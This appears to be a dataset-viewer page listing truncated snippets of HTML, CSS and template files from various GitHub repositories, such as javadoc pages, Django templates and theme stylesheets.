<table class="table table-mail" style="width:100%;margin-top:10px;"><tr><td class="space" style="width:20px;padding:7px 0;"> </td>
<td align="center" style="padding:7px 0;">
<table class="table" bgcolor="#ffffff" style="width:100%;"><tr><td align="center" class="logo" style="border-bottom:4px solid #333333... |
content/journalist/item-9.html | blakel12/metavault | <!DOCTYPE html>
<!--[if lt IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7 "> <![endif]-->
<!--[if IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]><html class="no-js lt-ie10 lt-ie9"> <![endif]-->
<!--[if IE 9]><html class="no-js lt-ie10"> <![endif]-->
<!--[if gt IE 8]><!-->
<html class... |
server/eats/templates/eats/admin/user_list.html | ajenhl/eats | {% extends "eats/admin/base.html" %}
{% block eats_content %}
<h1>Select user to change</h1>
<h2>Activated users</h2>
<ul>
{% for eats_user in eats_users %}
<li><a href="{{ eats_user.pk }}/">{{ eats_user.user }}</a></li>
{% endfor %}
</ul>
<h2>Unactivated users</h2>
{% if django_users %}
<p>The following use... |
WebProject1/index.html | qinq-net/sandbox | <!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8" />
<title>Untitled Document</title>
</head>
<body>
Hello World!
</body>
</html> |
external/tbb/doc/html/a00337.html | IMP-Engine/Engine | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
contrib/help-pages-translation-to-french/rules/russiansolitaire.html | shlomif/PySolFC | <h1>Russian Solitaire</h1>
<p>
Type Yukon. 1 jeu. 1 donne.
<h3>But du jeu</h3>
<p>
Déplacez toutes les cartes vers les fondations.
<h3>Description rapide</h3>
<p>
Similaire au <a href="yukon.html">Yukon</a>, les suites étant formées par ordre décroissant, par couleur de cartes.
<h3>Règles</h3>
<p>
Les ... |
static/plugins/aerowindow/css/AeroWindow.css | jimmy201602/webterminal | .AeroWindow {
position: absolute;
background: url(../images/lines.png);
background-position: 0px -100px;
z-index: 10;
overflow: hidden;
display: block;
}
.AeroWindow .table-tl {
background: url(../images/tl.png);
min-width: 9px;
height: 9px;
}
.AeroWindow .table-tm {
background: url(... |
bin/solr-4.3.1/docs/solr-solrj/org/apache/solr/client/solrj/request/class-use/CoreAdminRequest.Unload.html | jeffersonmolleri/sesra | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_45) on Sun Jun 09 12:16:19 GMT+05:30 2013 -->
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>
Uses of Class org.apache.so... |
.gradlew/wrapper/dists/gradle-2.0-all/7rd4e4rcg4riqi0j6j508m2lbk/gradle-2.0/docs/groovydoc/org/gradle/api/logging/LoggingManager.html | VolitionEos/DungFactory | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- **************************************************************** -->
<!-- * PLEASE KEEP COMPLICATED EXPRESSIONS OUT OF THESE TEMPLATES, * -->
<!-- * i.e. only iterate & print data where possible. Thanks, Jez. *... |
webgui/html/main.html | datsideofthemoon/openbts-webui | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>OpenBTS - {{ pagename }... |
me-advert/console/static/css/plugins/datatable/TableTools.css | olegvg/me-advert | /*
* File: TableTools.css
* Description: Styles for TableTools 2
* Author: Allan Jardine (www.sprymedia.co.uk)
* Language: Javascript
* License: GPL v2 / 3 point BSD
* Project: DataTables
*
* Copyright 2009-2012 Allan Jardine, all rights reserved.
*
* * * * * * * * * * * * * * * * * * ... |
css/editor-style.css | bestwebsoft/restaurant-advisor-wordpress-theme | /*
Theme Name: Restaurant Advisor
Description: Used to style the TinyMCE editor.
*/
h1,
h2,
h3,
h4,
h5,
h6 {
font-family: Lato-Bold, sans-serif;
margin: 12px 0 13px 0;
}
p {
font-family: Lato-Bold, sans-serif;
font-size: 15.2px;
letter-spacing: 0.35px;
}
dl {
font-family: OpenSans, sans-serif;
margin: 25px 0 ... |
doc/dicomreader/class-use/ShowGPL.html | slabua/dicomreader | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_161) on Mon Mar 19 01:07:37 CET 2018 -->
<title>Uses of Class dicomreader.ShowGPL</title>
<meta name="date" content="2018-03-19">
<link rel="st... |
Demo/index.html | raghwc/sqlite-helper | <!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
<script src="js/sqlite-helper.js"></script>
<script>
$(document).ready(function () {
try {
... |
tags/spring-boot/index.html | Piscesilent/piscesilent.github.io | <!DOCTYPE HTML>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>Spring Boot - SilenT's Blog</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=3, minimum-scale=1">
<meta name="description" content="Spring Boot">
<meta name="author" content="SilenT">
<me... |
elections/templates/elections/ranking_update.html | lfalvarez/nouabook | {% extends "base.html" %}
{% load i18n %}
{% load staticfiles %}
{% load thumbnail %}
{% load votainteligente_extras %}
{% load candideitorg_templetags %}
{% block title %} operations {% endblock %}
{% block content %}
{% for i in data %}
<li>{{ i }}</li>
{% endfor %}
{{ chaine }} counter 1 : {{co... |
doc/br/com/ambiciousteam/pfbistro/view/class-use/ViewClient.html | AmbiciousTeam/PFBistro | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="pt">
<head>
<!-- Generated by javadoc (version 1.7.0_45) on Sat Dec 21 07:15:40 GMT-03:00 2013 -->
<title>Uses of Class br.com.ambiciousteam.pfbistro.view.ViewClient</title>
<meta na... |
index.html | rhiever/dissertation-topic-network | <!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" itemscope itemtype="http://schema.org/Map">
<head>
<title>Michigan State University Dissertation Topic Network</title>
<link rel="shortcut i... |
guide/doc/details/lewi/69.html | burakbayramli/kod | <meta name="viewport" content="user-scalable=no, width=device-width" />
<body>
<h3>69</h3>
<p>
Your combination in many respects produces a dreamer that thinks in
large broad terms; a Virgo who consistently belies the nature of the
sign. You are capable of doing things that you probably disapprove of,
for the sake of a... |
.edit/docs/javascript/Global_Objects/Date/getDay().html | paperbenni/Droid-Script | <html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="../../../css/themes/default/theme.min.css" />
<link rel="stylesheet" href="../../../css/themes/default/jquery.mobile.structure-1.2.0.min.css" />
<script src="../../../js/energize-min.js"></script>
... |
doc/myPack/package-summary.html | maccamcmacca/Ticket-System | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_76) on Mon Mar 23 09:23:27 GMT 2015 -->
<title>myPack</title>
<meta name="date" content="2015-03-23">
<link rel="stylesheet" type="text... |
javadoc/constant-values.html | ZachOhara/Image-Comparator | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_51) on Wed Jul 29 03:20:11 PDT 2015 -->
<title>Constant Field Values</title>
<meta name="date" content="2015-07-29">
<link rel="stylesheet" typ... |
doc/glib-2.0/GLib.Math.isinf.html | themightyug/ledborg-server | <?xml version="1.0" encoding="utf-8"?>
<html>
<head>
<title>GLib.Math.isinf -- Vala Binding Reference</title>
<link href="../style.css" rel="stylesheet" type="text/css"/><script src="../scripts.js" type="text/javascript">
</script>
</head>
<body>
<div class="site_header">GLib.Math.isinf Reference ... |
RossFamilyTree/evt/9/7/d15f6012cbc7596f1eb94ffda79.html | RossGammon/the-gammons.net | <!DOCTYPE html>
<html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-GB">
<title>Ross Gammon’s Family Tree - Events</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mo... |
resources/Apache/Apache-POI-3.16-beta2/poi-bin-3.16-beta2-20170202/poi-3.16-beta2/docs/apidocs/org/apache/poi/hslf/record/PPDrawingGroup.html | doughtnerd/POD | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<title>PPDrawingGroup (POI API Documentation)</title>
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="te... |
doc/html/functions_vars.html | DayBreakZhang/GPL | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
LahotiMode/LahotiMode/default.html | shubham-goel/tussle | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>LahotiMode</title>
<!-- WinJS references -->
<link href="//Microsoft.WinJS.2.0/css/ui-dark.css" rel="stylesheet" />
<script src="//Microsoft.WinJS.2.0/js/base.js"></script>
<script src="//Microsoft.WinJS.2.0/js/ui.js"></scr... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.